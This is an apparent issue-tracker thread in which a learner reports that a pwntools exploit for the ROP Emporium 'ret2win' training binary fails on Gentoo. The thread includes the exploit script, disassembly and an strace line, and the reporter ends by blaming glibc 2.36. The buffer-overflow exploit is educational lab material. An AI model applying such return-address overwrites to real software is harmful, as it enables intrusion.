The exploit I attached couldn't cat flag.txt which is stored in the same directory as the binary's. I tried running that script with strace and found this sus thing right where the program should cat flag.txt. /proc/pid/cwd exists when the program waits for input. ``` readlink("/proc/30556/cwd", 0x7ffcefe695a0, 4096) = -1 ENOENT (No such file or directory) ``` function that cats flag.txt: ``` [0x7f4f566fa920]> pdf @ sym.ret2win ┌ 27: sym.ret2win (); │ 0x00400756 55 push rbp │ 0x00400757 4889e5 mov rbp, rsp │ 0x0040075a bf26094000 mov edi, str.Well_done__Heres_your_flag: ; 0x400926 ; "Well done! Here's your flag:" │ 0x0040075f e8ecfdffff call sym.imp.puts ; int puts(const char *s) │ 0x00400764 bf43094000 mov edi, str._bin_cat_flag.txt ; 0x400943 ; "/bin/cat flag.txt" │ 0x00400769 e8f2fdffff call sym.imp.system ; int system(const char *string) │ 0x0040076e 90 nop │ 0x0040076f 5d pop rbp └ 0x00400770 c3 ret [0x7f4f566fa920]> ``` ss of the issue: https://imgur.com/a/PB6uQkO I've tried it on kali, arch, debian and ubuntu in the past. This is the first time I'm using Gentoo as a bin exploit lab. link to challenge: https://ropemporium.com/challenge/ret2win.html exploit i used: ``` from pwn import * context.arch = 'amd64' context.log_level = "error" exe = ELF("./ret2win") offset = 40 payload = flat({ offset:[ p64(0x00400756) ] }) io = process(exe.path) io.sendlineafter(b"\n> ", payload) print(io.recvallS()) ``` kernel: 6.0.7 python: 3.10.8 full strace of exploit: https://jek1.co/pastes/strace.txt
1. I'm struggling to see how this would vary across distros at all unless kernel configuration, version, or sysctl toggles are different. 2. Please include a clear set of instructions to reproduce. 3. Please include a text version of the screenshot.
Just to add: it's not clear anything is actually wrong here with anything we're doing. Exploit development involves handling various edge cases and different behaviour on systems. While it's interesting that you supposedly see something different on Debian, that doesn't make it something that it's my role to fix. For all I know, you just need to adapt your code.
yea mb, those bins don't work with glibc 2.36